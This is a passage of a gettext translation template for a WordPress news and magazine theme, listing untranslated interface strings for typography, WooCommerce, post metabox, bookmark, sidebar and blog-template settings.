msgstr "" #: backend/panels/typography.php:538 msgid "Read More Font" msgstr "" #: backend/panels/typography.php:539 msgid "Select font values for the read more button" msgstr "" #: backend/panels/typography.php:556 msgid "" "Select a font size (px) for the readmore button on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:563 msgid "" "Select a font size (px) for the readmore button on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:578 msgid "Inputs & Button" msgstr "" #: backend/panels/typography.php:581 msgid "" "Select font for the input, textarea and button. Selecting same font family settings " "for similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:587 msgid "Input Font Settings" msgstr "" #: backend/panels/typography.php:593 msgid "Input & Textarea Font" msgstr "" #: backend/panels/typography.php:594 msgid "The settings below apply to the input and textarea form on your website." msgstr "" #: backend/panels/typography.php:611 msgid "" "Select a font size (px) for input and textarea on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:618 msgid "" "Select a font size (px) for input and textarea on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:630 msgid "Button Font Settings" msgstr "" #: backend/panels/typography.php:636 msgid "Button Font" msgstr "" #: backend/panels/typography.php:637 msgid "The settings below apply to all button on your website." msgstr "" #: backend/panels/typography.php:654 backend/panels/typography.php:1129 msgid "" "Select a font size (px) for buttons on mobile devices (max screen width: 767px), Leave " "this option blank to set the default value." msgstr "" #: backend/panels/typography.php:661 backend/panels/typography.php:1136 msgid "" "Select a font size (px) for buttons on tablet devices (max screen width: 1024px), " "Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:686 msgid "" "Select font values for Single Headline (Single Post Title) and Single Tagline (Single " "Sub Title)." msgstr "" #: backend/panels/typography.php:692 msgid "Single Headline Fonts (Post Title)" msgstr "" #: backend/panels/typography.php:699 msgid "" "The single headline will use H1 font settings as the default. You can override the " "settings in this panel." msgstr "" #: backend/panels/typography.php:704 msgid "Full Width Headline" msgstr "" #: backend/panels/typography.php:705 msgid "" "Select font values for the single headline for displaying in the full width layouts." msgstr "" #: backend/panels/typography.php:722 msgid "Content Font Size (Small Headline)" msgstr "" #: backend/panels/typography.php:723 #, php-format msgid "" "Select a font size (px) for the single headline or displaying in 66.67% of the site " "width." msgstr "" #: backend/panels/typography.php:730 msgid "" "Select a font size (px) for the single headline on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:737 msgid "" "Select a font size (px) for the single headline on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:749 msgid "Single Tagline Fonts (Sub Title)" msgstr "" #: backend/panels/typography.php:756 msgid "" "The single tagline will use the H2 tag font settings. You can override settings in " "this panel." msgstr "" #: backend/panels/typography.php:761 msgid "Full Width Tagline" msgstr "" #: backend/panels/typography.php:762 msgid "" "Select font values for the single tagline for displaying in the full width layouts." msgstr "" #: backend/panels/typography.php:779 msgid "Content Font Size (Small Tagline)" msgstr "" #: backend/panels/typography.php:780 #, php-format msgid "" "Select a font size (px) for the single tagline or displaying in 66.67% of the site " "width." msgstr "" #: backend/panels/typography.php:787 msgid "" "Select a font size (px) for the single tagline on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:794 msgid "" "Select a font size (px) for the single tagline on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:806 backend/panels/typography.php:812 msgid "Block Quote" msgstr "" #: backend/panels/typography.php:813 msgid "Select font values for the block quote." msgstr "" #: backend/panels/typography.php:848 msgid "" "Select font values for the breadcrumb bar. Selecting same font family settings for " "similar elements will optimize for your website speed." msgstr "" #: backend/panels/typography.php:853 msgid "Breadcrumb Font" msgstr "" #: backend/panels/typography.php:854 msgid "The settings below apply to the breadcrumb bar." msgstr "" #: backend/panels/typography.php:871 msgid "" "Select a font size (px) for the breadcrumbs bar on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:878 msgid "" "Select a font size (px) for the breadcrumbs bar on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:893 msgid "Header Menus" msgstr "" #: backend/panels/typography.php:896 msgid "Select font values for menus on the website header." msgstr "" #: backend/panels/typography.php:902 functions.php:56 templates/header/templates.php:241 msgid "Main Menu" msgstr "" #: backend/panels/typography.php:908 msgid "Menu Font" msgstr "" #: backend/panels/typography.php:909 msgid "Select font for top menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:924 msgid "Sub-Level Menu Font" msgstr "" #: backend/panels/typography.php:925 msgid "Select font for sub-level menu items for displaying in the main menu." msgstr "" #: backend/panels/typography.php:947 functions.php:57 templates/header/templates.php:609 msgid "Mobile Menu" msgstr "" #: backend/panels/typography.php:953 msgid "Mobile Menu Font" msgstr "" #: backend/panels/typography.php:954 msgid "Select font for top menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:969 msgid "Sub-Level Mobile Menu Font" msgstr "" #: backend/panels/typography.php:970 msgid "Select font for sub-level menu items for displaying in the mobile menu." msgstr "" #: backend/panels/typography.php:992 functions.php:58 msgid "Mobile Quick Access" msgstr "" #: backend/panels/typography.php:998 msgid "Mobile Quick Access Menu Font" msgstr "" #: backend/panels/typography.php:999 msgid "" "Select font for mobile quick access menu items for displaying in the mobile device." msgstr "" #: backend/panels/typography.php:1030 msgid "Block Heading" msgstr "" #: backend/panels/typography.php:1033 msgid "Select font values for the block heading." msgstr "" #: backend/panels/typography.php:1038 msgid "Heading Font" msgstr "" #: backend/panels/typography.php:1039 msgid "" "Heading tag will use default H tag font settings. Select font values if you would like " "to choose a custom font." msgstr "" #: backend/panels/typography.php:1057 msgid "" "Select a font size (px) for the heading block on mobile devices (max screen width: " "767px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:1064 msgid "" "Select a font size (px) for the heading block on tablet devices (max screen width: " "1024px), Leave this option blank to set the default value." msgstr "" #: backend/panels/typography.php:1069 msgid "Tagline Font" msgstr "" #: backend/panels/typography.php:1070 msgid "" "Tagline tag will use default H6 tag font settings. Select font values if you would " "like to choose a custom font." msgstr "" #: backend/panels/typography.php:1096 msgid "Archive & Menu Widgets" msgstr "" #: backend/panels/typography.php:1099 msgid "" "Select font values for the default widgets, apply to the archive, category widgets..." msgstr "" #: backend/panels/typography.php:1105 msgid "Sidebar Archive & Menu Widgets" msgstr "" #: backend/panels/typography.php:1111 msgid "Default Widgets" msgstr "" #: backend/panels/typography.php:1112 msgid "Select font for the default archives, categories and menu fonts." msgstr "" #: backend/panels/woocommerce.php:15 msgid "" "Woocommerce plugin not found! Please install and active Woocommerce to active settings below." msgstr "" #: backend/panels/woocommerce.php:28 msgid "WooCommerce" msgstr "" #: backend/panels/woocommerce.php:29 msgid "Select options for the shop." msgstr "" #: backend/panels/woocommerce.php:44 msgid "WooCommerce Pages" msgstr "" #: backend/panels/woocommerce.php:45 msgid "Select options for the shop and archive and single product pages." msgstr "" #: backend/panels/woocommerce.php:54 msgid "Shop Page Options" msgstr "" #: backend/panels/woocommerce.php:61 msgid "" "Input your template shortcode you would like to use Elementor builder to create a " "featured section at the top of shop page." msgstr "" #: backend/panels/woocommerce.php:71 msgid "Products per Page" msgstr "" #: backend/panels/woocommerce.php:72 msgid "" "Select number of products per page, leave blank if you want to set as Settings default." msgstr "" #: backend/panels/woocommerce.php:79 msgid "Shop Sidebar Position" msgstr "" #: backend/panels/woocommerce.php:80 msgid "Select sidebar position for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/woocommerce.php:87 msgid "Shop Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:88 msgid "Select a sidebar for the shop page if you enabled the sidebar." msgstr "" #: backend/panels/woocommerce.php:102 msgid "Shop - Archive Pages Options" msgstr "" #: backend/panels/woocommerce.php:108 msgid "Archive Sidebar Position" msgstr "" #: backend/panels/woocommerce.php:109 msgid "" "Select a sidebar position for product category and archive pages if you enabled the " "sidebar." msgstr "" #: backend/panels/woocommerce.php:116 msgid "Archive Sidebar Name" msgstr "" #: backend/panels/woocommerce.php:117 msgid "" "Select a sidebar for product category and archive pages if you enabled the sidebar." msgstr "" #: backend/panels/woocommerce.php:131 msgid "Single Product Page" msgstr "" #: backend/panels/woocommerce.php:137 msgid "Show Review Box" msgstr "" #: backend/panels/woocommerce.php:138 msgid "enable or disable the review box in the single product page." msgstr "" #: backend/panels/woocommerce.php:147 msgid "Total Related Products" msgstr "" #: backend/panels/woocommerce.php:148 msgid "" "Select total related product to show at once. leave blank if you want to set as " "default." msgstr "" #: backend/panels/woocommerce.php:172 msgid "Elements Styling" msgstr "" #: backend/panels/woocommerce.php:173 msgid "Select styling options of your shop." msgstr "" #: backend/panels/woocommerce.php:181 msgid "Show Percentage Saved" msgstr "" #: backend/panels/woocommerce.php:182 msgid "Display Percentage saved on WooCommerce sale products" msgstr "" #: backend/panels/woocommerce.php:188 msgid "Price Color" msgstr "" #: backend/panels/woocommerce.php:189 msgid "Select a color value for the product price." msgstr "" #: backend/panels/woocommerce.php:196 msgid "Dark - Price Color" msgstr "" #: backend/panels/woocommerce.php:197 msgid "Select a color value for the product price in the dark mode." msgstr "" #: backend/panels/woocommerce.php:204 msgid "Review Start Color" msgstr "" #: backend/panels/woocommerce.php:205 msgid "Select a color value for the stars review." msgstr "" #: backend/panels/woocommerce.php:212 msgid "Dark - Review Start Color" msgstr "" #: backend/panels/woocommerce.php:213 msgid "Select a color value for the stars review in the dark mode." msgstr "" #: backend/panels/woocommerce.php:220 msgid "Sale Icon Background" msgstr "" #: backend/panels/woocommerce.php:221 msgid "Select a background color value for the sale icon." msgstr "" #: backend/panels/woocommerce.php:228 msgid "Add to Cart Color" msgstr "" #: backend/panels/woocommerce.php:229 msgid "Select a background color for the \"Add to Cart\" button." msgstr "" #: backend/panels/woocommerce.php:237 msgid "Product Title Font" msgstr "" #: backend/panels/woocommerce.php:238 msgid "Select a custom font for the product title." msgstr "" #: backend/panels/woocommerce.php:253 msgid "Price Font" msgstr "" #: backend/panels/woocommerce.php:254 msgid "Select a custom font for the product price." msgstr "" #: backend/single-metaboxes.php:44 msgid "Single Page Settings" msgstr "" #: backend/single-metaboxes.php:45 msgid "" "Options below will apply to the single page and Elementor page. To config for the blog " "page, navigate to Theme Options > Blog & Achives." msgstr "" #: backend/single-metaboxes.php:56 msgid "Page Header Style" msgstr "" #: backend/single-metaboxes.php:57 msgid "" "Select a top header style for this page. This option is used for the single page (not " "Elementor page)." msgstr "" #: backend/single-metaboxes.php:89 msgid "" "Select a position for the sidebar of this page. It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:98 msgid "" "Assign a sidebar for this page. It will override on the default settings in the Theme " "Options panel." msgstr "" #: backend/single-metaboxes.php:109 msgid "" "The transparent headers is only suitable with the page has a sliders or wide image at " "the top." msgstr "" #: backend/single-metaboxes.php:114 msgid "Select a site header style for this page" msgstr "" #: backend/single-metaboxes.php:122 msgid "" "Input a Ruby Template shortcode for displaying as the website header for this page. " "Leave this option blank to set as the above setting." msgstr "" #: backend/single-metaboxes.php:130 msgid "Select navigation bar style for the header of this page." msgstr "" #: backend/single-metaboxes.php:142 backend/single-metaboxes.php:919 msgid "Top Site Advert" msgstr "" #: backend/single-metaboxes.php:143 msgid "Disable the top ad site for this page." msgstr "" #: backend/single-metaboxes.php:153 backend/single-metaboxes.php:930 msgid "Header Alert Bar" msgstr "" #: backend/single-metaboxes.php:154 backend/single-metaboxes.php:931 msgid "Enable or disable the alert bar below the header." msgstr "" #: backend/single-metaboxes.php:167 backend/single-metaboxes.php:944 msgid "Site Footer" msgstr "" #: backend/single-metaboxes.php:172 backend/single-metaboxes.php:949 msgid "Footer Template Shortcode" msgstr "" #: backend/single-metaboxes.php:173 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for this page, " "Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:187 msgid "Post Options" msgstr "" #: backend/single-metaboxes.php:193 msgid "Tagline & Highlights" msgstr "" #: backend/single-metaboxes.php:198 msgid "Tagline" msgstr "" #: backend/single-metaboxes.php:199 msgid "Input a tagline for this post, It will display under the single post title." msgstr "" #: backend/single-metaboxes.php:205 msgid "Post highlights" msgstr "" #: backend/single-metaboxes.php:206 msgid "" "Input highlights for this post. This section will appear a the top of content. To edit " "this section heading, Navigate to Theme Options > Single Post > Tagline & highlights" msgstr "" #: backend/single-metaboxes.php:208 msgid "+Add Highlight" msgstr "" #: backend/single-metaboxes.php:212 msgid "Highlight Point" msgstr "" #: backend/single-metaboxes.php:219 msgid "Tagline HTML Tag" msgstr "" #: backend/single-metaboxes.php:220 msgid "Select a HTML tag for this tagline." msgstr "" #: backend/single-metaboxes.php:229 msgid "p" msgstr "" #: backend/single-metaboxes.php:243 msgid "Featured Crop Size" msgstr "" #: backend/single-metaboxes.php:244 msgid "" "Select a crop size for the featured image in case you would like to control the size." msgstr "" #: backend/single-metaboxes.php:251 msgid "Featured Caption" msgstr "" #: backend/single-metaboxes.php:252 msgid "Input caption text for the featured image." msgstr "" #: backend/single-metaboxes.php:258 msgid "Attribution" msgstr "" #: backend/single-metaboxes.php:259 msgid "Input attribution for the featured image." msgstr "" #: backend/single-metaboxes.php:271 msgid "Select Primary Category" msgstr "" #: backend/single-metaboxes.php:275 msgid "Select a Primary Category for this post." msgstr "" #: backend/single-metaboxes.php:276 msgid "" "It is useful in case this post has a lot of categories and you want to display only " "one in listings." msgstr "" #: backend/single-metaboxes.php:284 msgid "This option is useful in case you would like to create a custom entry meta." msgstr "" #: backend/single-metaboxes.php:290 msgid "Input value or text for the custom meta that you created in Theme Options panel." msgstr "" #: backend/single-metaboxes.php:298 msgid "Standard Format" msgstr "" #: backend/single-metaboxes.php:300 msgid "" "The settings below apply to the standard post format. Using the corresponding panel if " "you select another post format for this post." msgstr "" #: backend/single-metaboxes.php:304 msgid "Standard Layout" msgstr "" #: backend/single-metaboxes.php:305 msgid "" "Select a standard layout for this post, It will override on the default settings in " "the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:316 msgid "Video Format" msgstr "" #: backend/single-metaboxes.php:318 msgid "" "Please ensure that the \"Video\" option is chosen under \"Post Format\" selection box " "when you use this panel." msgstr "" #: backend/single-metaboxes.php:322 msgid "Video Layout" msgstr "" #: backend/single-metaboxes.php:323 msgid "" "Select a video layout for this post, It will override on the default settings in the " "Theme Options panel." msgstr "" #: backend/single-metaboxes.php:331 msgid "Video URL" msgstr "" #: backend/single-metaboxes.php:332 msgid "Input your video link, support: Youtube, Vimeo, DailyMotion." msgstr "" #: backend/single-metaboxes.php:338 msgid "Preview Video" msgstr "" #: backend/single-metaboxes.php:339 msgid "" "Upload your preview video. Keep video short and lightweight as possible to save server " "bandwidth." msgstr "" #: backend/single-metaboxes.php:344 backend/single-metaboxes.php:392 msgid "Iframe Embed Code" msgstr "" #: backend/single-metaboxes.php:345 msgid "Input iframe embed code if WordPress cannot support your video URL." msgstr "" #: backend/single-metaboxes.php:350 msgid "Self-Hosted Video" msgstr "" #: backend/single-metaboxes.php:351 msgid "Upload your video file, support: mp4, m4v, webm, ogv, wmv, flv files." msgstr "" #: backend/single-metaboxes.php:357 msgid "Enable or disable autoplay video for this post." msgstr "" #: backend/single-metaboxes.php:371 msgid "Audio Format" msgstr "" #: backend/single-metaboxes.php:373 msgid "" "Please ensure that the \"Audio\" option is chosen under \"Post Format\" selection box " "when you use this panel." msgstr "" #: backend/single-metaboxes.php:377 msgid "Audio Layout" msgstr "" #: backend/single-metaboxes.php:378 msgid "" "Select a audio layout for this post, It will override on the default settings in the " "Theme Options panel." msgstr "" #: backend/single-metaboxes.php:386 msgid "Audio URL" msgstr "" #: backend/single-metaboxes.php:387 msgid "" "Input your audio URL, support: SoundCloud, MixCloud. Do not forget to check \"Audio\" " "in Post Format section." msgstr "" #: backend/single-metaboxes.php:393 msgid "Input iframe embed code if WordPress cannot support your audio URL." msgstr "" #: backend/single-metaboxes.php:398 msgid "Self-Hosted Audio" msgstr "" #: backend/single-metaboxes.php:399 msgid "Upload your audio file, support: mp3, ogg, wma, m4a, wav files." msgstr "" #: backend/single-metaboxes.php:405 msgid "Enable or disable autoplay audio for this post." msgstr "" #: backend/single-metaboxes.php:418 msgid "Gallery Format" msgstr "" #: backend/single-metaboxes.php:420 msgid "" "Please ensure that the \"Gallery\" option is chosen under \"Post Format\" selection " "box when you use this panel." msgstr "" #: backend/single-metaboxes.php:425 msgid "" "Select a gallery layout for this post, It will override on the default settings in the " "Theme Options panel." msgstr "" #: backend/single-metaboxes.php:433 msgid "Upload Gallery" msgstr "" #: backend/single-metaboxes.php:434 msgid "Upload your images for this gallery." msgstr "" #: backend/single-metaboxes.php:448 msgid "" "Select a position for the sidebar of this post. It will override on the default " "settings in the Theme Options panel." msgstr "" #: backend/single-metaboxes.php:457 msgid "" "Assign a sidebar for this post. It will override on the default settings in the Theme " "Options panel." msgstr "" #: backend/single-metaboxes.php:466 msgid "Review" msgstr "" #: backend/single-metaboxes.php:471 msgid "Post Review" msgstr "" #: backend/single-metaboxes.php:472 msgid "Enable or disable the review feature for this post." msgstr "" #: backend/single-metaboxes.php:476 backend/single-metaboxes.php:615 msgid "-- Disable --" msgstr "" #: backend/single-metaboxes.php:484 msgid "Enable or disable visitors can rate and review this post in the comment box." msgstr "" #: backend/single-metaboxes.php:489 msgid "Enable with Review" msgstr "" #: backend/single-metaboxes.php:490 msgid "Force Enable for This Post" msgstr "" #: backend/single-metaboxes.php:496 msgid "Review Title" msgstr "" #: backend/single-metaboxes.php:497 msgid "Input a title for this review section." msgstr "" #: backend/single-metaboxes.php:499 msgid "Review Overview" msgstr "" #: backend/single-metaboxes.php:503 msgid "Review Type" msgstr "" #: backend/single-metaboxes.php:504 msgid "Select a type of review for this post." msgstr "" #: backend/single-metaboxes.php:508 msgid "Stars (1 > 5)" msgstr "" #: backend/single-metaboxes.php:509 msgid "Score (1 > 10)" msgstr "" #: backend/single-metaboxes.php:515 msgid "Add Criteria" msgstr "" #: backend/single-metaboxes.php:516 msgid "Create your review criteria based on the type you choose." msgstr "" #: backend/single-metaboxes.php:521 msgid "Item Label" msgstr "" #: backend/single-metaboxes.php:523 msgid "Criteria" msgstr "" #: backend/single-metaboxes.php:526 msgid "Score (1 > 10) or Rating (1 > 5)" msgstr "" #: backend/single-metaboxes.php:534 msgid "Review Image" msgstr "" #: backend/single-metaboxes.php:535 msgid "Upload a background header image for this review section." msgstr "" #: backend/single-metaboxes.php:540 msgid "Meta Description" msgstr "" #: backend/single-metaboxes.php:541 msgid "" "Input a short description to display before the review score, For example: Good, Bad..." msgstr "" #: backend/single-metaboxes.php:546 msgid "Advantages" msgstr "" #: backend/single-metaboxes.php:547 msgid "Input advantages for this review." msgstr "" #: backend/single-metaboxes.php:552 backend/single-metaboxes.php:566 msgid "Item" msgstr "" #: backend/single-metaboxes.php:554 msgid "advantage item" msgstr "" #: backend/single-metaboxes.php:560 msgid "Disadvantages" msgstr "" #: backend/single-metaboxes.php:561 msgid "Input disadvantages for this review." msgstr "" #: backend/single-metaboxes.php:568 msgid "disadvantage item" msgstr "" #: backend/single-metaboxes.php:574 msgid "Final Summary" msgstr "" #: backend/single-metaboxes.php:575 msgid "Input final summary for this review." msgstr "" #: backend/single-metaboxes.php:580 msgid "Offer Label" msgstr "" #: backend/single-metaboxes.php:581 msgid "Input a offer label (Call to action) for this product review." msgstr "" #: backend/single-metaboxes.php:586 msgid "Offer Destination URL" msgstr "" #: backend/single-metaboxes.php:587 msgid "Input the destination URL of the offer." msgstr "" #: backend/single-metaboxes.php:592 msgid "Price Offer" msgstr "" #: backend/single-metaboxes.php:593 msgid "Input the price of the offer." msgstr "" #: backend/single-metaboxes.php:598 msgid "Currency" msgstr "" #: backend/single-metaboxes.php:599 msgid "Input the currency of the price." msgstr "" #: backend/single-metaboxes.php:612 msgid "Enable or disable sponsored content for this post." msgstr "" #: backend/single-metaboxes.php:622 msgid "Sponsor URL" msgstr "" #: backend/single-metaboxes.php:623 msgid "Input the sponsor website URL." msgstr "" #: backend/single-metaboxes.php:629 msgid "Sponsor Name" msgstr "" #: backend/single-metaboxes.php:630 msgid "Input the sponsor brand name for this post" msgstr "" #: backend/single-metaboxes.php:636 msgid "Sponsor Logo" msgstr "" #: backend/single-metaboxes.php:637 msgid "Upload the sponsor logo for this post, recommended height for the logo is 52px." msgstr "" #: backend/single-metaboxes.php:642 msgid "Sponsor Light Logo" msgstr "" #: backend/single-metaboxes.php:643 msgid "" "Upload the sponsor light logo for this post, recommended height for the logo is 52px." msgstr "" #: backend/single-metaboxes.php:649 msgid "Directly redirect to the sponsor website when clicking on the post listing title." msgstr "" #: backend/single-metaboxes.php:667 msgid "Fake View Value" msgstr "" #: backend/single-metaboxes.php:668 msgid "" "Input a starting view value for this post. Leave blank if you want to display real " "data." msgstr "" #: backend/single-metaboxes.php:676 msgid "Entry Widgets" msgstr "" #: backend/single-metaboxes.php:681 msgid "Top Entry Widgets Area" msgstr "" #: backend/single-metaboxes.php:682 msgid "Enable or disable the top entry widgets for this post." msgstr "" #: backend/single-metaboxes.php:692 msgid "Bottom Entry Widgets Area" msgstr "" #: backend/single-metaboxes.php:693 msgid "Enable or disable the bottom entry widgets for this post." msgstr "" #: backend/single-metaboxes.php:705 msgid "Table of Content" msgstr "" #: backend/single-metaboxes.php:711 msgid "Enable or disable the table content for this post." msgstr "" #: backend/single-metaboxes.php:723 msgid "Select a layout for the table of contents of this post." msgstr "" #: backend/single-metaboxes.php:737 msgid "" "Input a position (after x paragraphs) to display the table of contents box. Leave " "blank to use the theme option setting, Set \"-1\" for displaying at the top." msgstr "" #: backend/single-metaboxes.php:744 msgid "Break Page Selection" msgstr "" #: backend/single-metaboxes.php:745 msgid "" "Display page selected section when you use break pages for a lengthy content post." msgstr "" #: backend/single-metaboxes.php:750 msgid "Headings Table" msgstr "" #: backend/single-metaboxes.php:751 msgid "" "Input the heading for each page corresponding to the page break tags. Please input all " "headings for pages to show the section." msgstr "" #: backend/single-metaboxes.php:753 msgid "+Add Heading" msgstr "" #: backend/single-metaboxes.php:757 msgid "Input Heading" msgstr "" #: backend/single-metaboxes.php:766 msgid "Sources/Via" msgstr "" #: backend/single-metaboxes.php:771 msgid "Post Sources" msgstr "" #: backend/single-metaboxes.php:772 msgid "Input the post source if it has, it will display at the bottom of post content" msgstr "" #: backend/single-metaboxes.php:775 msgid "+Add Post Source" msgstr "" #: backend/single-metaboxes.php:778 msgid "Source Name" msgstr "" #: backend/single-metaboxes.php:783 msgid "Source URL" msgstr "" #: backend/single-metaboxes.php:792 msgid "Post Via" msgstr "" #: backend/single-metaboxes.php:793 msgid "Input the post via if it has, it will display at the bottom of post content" msgstr "" #: backend/single-metaboxes.php:796 msgid "+Add Post Via" msgstr "" #: backend/single-metaboxes.php:799 msgid "Via Name" msgstr "" #: backend/single-metaboxes.php:804 msgid "Via URL" msgstr "" #: backend/single-metaboxes.php:821 msgid "" "Enable or disable ajax load next posts for this post. This setting will override on " "the global setting." msgstr "" #: backend/single-metaboxes.php:840 msgid "Enable or disable the reaction section at the end of this post." msgstr "" #: backend/single-metaboxes.php:858 msgid "Article Schema Markup" msgstr "" #: backend/single-metaboxes.php:859 msgid "" "Enable or disable Schema markup for this article. Disable default schema markup for " "this post if you use a 3rd plugin to create another post type for example Recipe, " "Videos." msgstr "" #: backend/single-metaboxes.php:870 msgid "Review Schema Markup" msgstr "" #: backend/single-metaboxes.php:871 msgid "" "Enable or disable review markup for this review. This option is useful in case you are " "using 3rd party markup plugin." msgstr "" #: backend/single-metaboxes.php:886 msgid "" "The transparent headers is only suitable for layouts: Standard 2, Standard 5, Video 2 " "and Audio 2." msgstr "" #: backend/single-metaboxes.php:891 msgid "Select a site header style for this post." msgstr "" #: backend/single-metaboxes.php:899 msgid "" "Input a Ruby Template shortcode for displaying as the website header for this page. " "This setting requests to select \"Use Ruby Template\" in site header setting in order " "to work." msgstr "" #: backend/single-metaboxes.php:907 msgid "Select navigation bar style for the header of this post." msgstr "" #: backend/single-metaboxes.php:920 msgid "Enable or disable the top ad site for this post." msgstr "" #: backend/single-metaboxes.php:950 msgid "" "Input a Ruby Template shortcode for displaying as the website footer for this post, " "Leave blank to set it as the default from the Theme Options panel." msgstr "" #: backend/theme-options.php:219 msgid "Foxiz Panel" msgstr "" #: backend/theme-options.php:224 msgid "Online Documentation" msgstr "" #: backend/theme-options.php:240 backend/theme-options.php:241 msgid "Theme Options" msgstr "" #: bookmark/bookmark.php:56 msgid "Removed from reading list" msgstr "" #: bookmark/bookmark.php:57 msgid "Undo" msgstr "" #: bookmark/bookmark.php:174 msgid "This article has been added to reading list" msgstr "" #: bookmark/bookmark.php:190 msgid "This article was removed from reading list" msgstr "" #: bookmark/bookmark.php:209 msgid "This article was removed from your bookmark" msgstr "" #: bookmark/template-helpers.php:29 msgid "Save it" msgstr "" #: bookmark/template-helpers.php:30 templates/entry.php:286 msgid "Remove" msgstr "" #: bookmark/template-helpers.php:59 msgid "Sign In to Save" msgstr "" #: bookmark/templates.php:60 msgid "You haven't saved anything yet." msgstr "" #: bookmark/templates.php:61 #, php-format msgid "" "Start saving your interested articles by clicking the %s icon and you'll find them all " "here." msgstr "" #: comments.php:25 msgid "← Older Comments" msgstr "" #: comments.php:26 msgid "Newer Comments →" msgstr "" #: comments.php:32 msgid "Comments are closed." msgstr "" #: includes/actions.php:44 templates/single/review-comment.php:57 msgid "Your name" msgstr "" #: includes/actions.php:47 msgid "Your email" msgstr "" #: includes/actions.php:51 msgid "Your Website" msgstr "" #: includes/actions.php:55 templates/single/review-comment.php:97 #: templates/single/templates.php:906 msgid "Leave a comment" msgstr "" #: includes/fallbacks.php:165 msgid "M" msgstr "" #: includes/fallbacks.php:167 msgid "k" msgstr "" #: includes/fallbacks.php:273 #, php-format msgid "Please assign a menu to the \"%s\" location under " msgstr "" #: includes/menu.php:302 msgid "Top News" msgstr "" #: includes/menu.php:325 templates/header/templates.php:727 msgid "Latest News" msgstr "" #: includes/sidebars.php:58 msgid "A sidebar section of your site." msgstr "" #: includes/sidebars.php:71 msgid "The default sidebar of your website" msgstr "" #: includes/sidebars.php:79 msgid "Header Advertising" msgstr "" #: includes/sidebars.php:80 msgid "Display widget ad at the bottom of the website header." msgstr "" #: includes/sidebars.php:86 msgid "More Menu Section" msgstr "" #: includes/sidebars.php:87 msgid "The submenu section when hovering on the more button." msgstr "" #: includes/sidebars.php:96 msgid "Footer - Top Full Width" msgstr "" #: includes/sidebars.php:97 msgid "The full width section at the top of the footer." msgstr "" #: includes/sidebars.php:105 msgid "Footer - Column 1" msgstr "" #: includes/sidebars.php:106 includes/sidebars.php:115 includes/sidebars.php:124 #: includes/sidebars.php:134 includes/sidebars.php:145 msgid "one of the columns of the footer area." msgstr "" #: includes/sidebars.php:114 msgid "Footer - Column 2" msgstr "" #: includes/sidebars.php:123 msgid "Footer - Column 3" msgstr "" #: includes/sidebars.php:133 msgid "Footer - Column 4" msgstr "" #: includes/sidebars.php:144 msgid "Footer - Column 5" msgstr "" #: includes/sidebars.php:155 msgid "Single Content - Top Area" msgstr "" #: includes/sidebars.php:156 msgid "" "The section at the top of the single post content. It usually uses to display adverts" msgstr "" #: includes/sidebars.php:164 msgid "Single Content - Bottom Area" msgstr "" #: includes/sidebars.php:165 msgid "" "The section at the bottom of the single post content. It usually uses to display " "adverts or the post related shortcode." msgstr "" #: searchform.php:14 msgid "Search for:" msgstr "" #: templates/ajax.php:128 msgid "You've reached the end of the list!" msgstr "" #: templates/ajax.php:186 msgid "More Results" msgstr "" #: templates/ajax.php:188 templates/blog.php:520 msgid "" "Sorry, but nothing matched your search terms. Please try again with some different " "keywords." msgstr "" #: templates/blocks/newsletter.php:42 templates/blocks/newsletter.php:44 #: templates/blocks/newsletter.php:47 templates/blocks/newsletter.php:106 #: templates/blocks/newsletter.php:108 templates/blocks/newsletter.php:111 msgid "newsletter featured" msgstr "" #: templates/blocks/playlist.php:52 msgid "Now Playing" msgstr "" #: templates/blog.php:13 msgid "Nothing Found" msgstr "" #: templates/blog.php:17 #, php-format msgid "Ready to publish your first post? Get started here." msgstr "" #: templates/blog.php:19 msgid "It looks like nothing was found at this location. Maybe try a search?" msgstr "" #: templates/blog.php:22 msgid "Return to Home" msgstr "" #: templates/blog.php:94 msgid "Find More:" msgstr "" #: templates/blog.php:232 #, php-format msgid "Search Results for: %s" msgstr "" #: templates/blog.php:233 #, php-format msgid "Showing %s results for your search" msgstr "" #: templates/blog.php:465 templates/entry.php:1171 msgid "Follow: " msgstr "" #: templates/blog.php:476 templates/modules/category.php:74 #: templates/modules/category.php:134 templates/modules/category.php:197 #: templates/modules/category.php:270 templates/modules/category.php:337 msgid "Article" msgstr "" #: templates/blog.php:478 templates/modules/category.php:72 #: templates/modules/category.php:132 templates/modules/category.php:195 #: templates/modules/category.php:268 templates/modules/category.php:335 msgid "Articles" msgstr "" #: templates/blog.php:494 msgid "Oops! Nothing here" msgstr "" #: templates/blog.php:497 msgid "Ready to publish your first post?" msgstr "" #: templates/blog.php:498 msgid " Get started here" msgstr "" #: templates/blog.php:501 msgid "It seems we can’t find what you’re looking for. Perhaps searching can help." msgstr "" #: templates/blog.php:505 templates/page.php:145 msgid "Return to Homepage" msgstr "" #: templates/entry.php:320 #, php-format msgid "%s ago" msgstr "" #: templates/entry.php:367 templates/entry.php:401 msgid "Posted" msgstr "" #: templates/entry.php:519 msgid "Tags:" msgstr "" #: templates/entry.php:553 msgid "Add a Comment" msgstr "" #: templates/entry.php:555 msgid "1 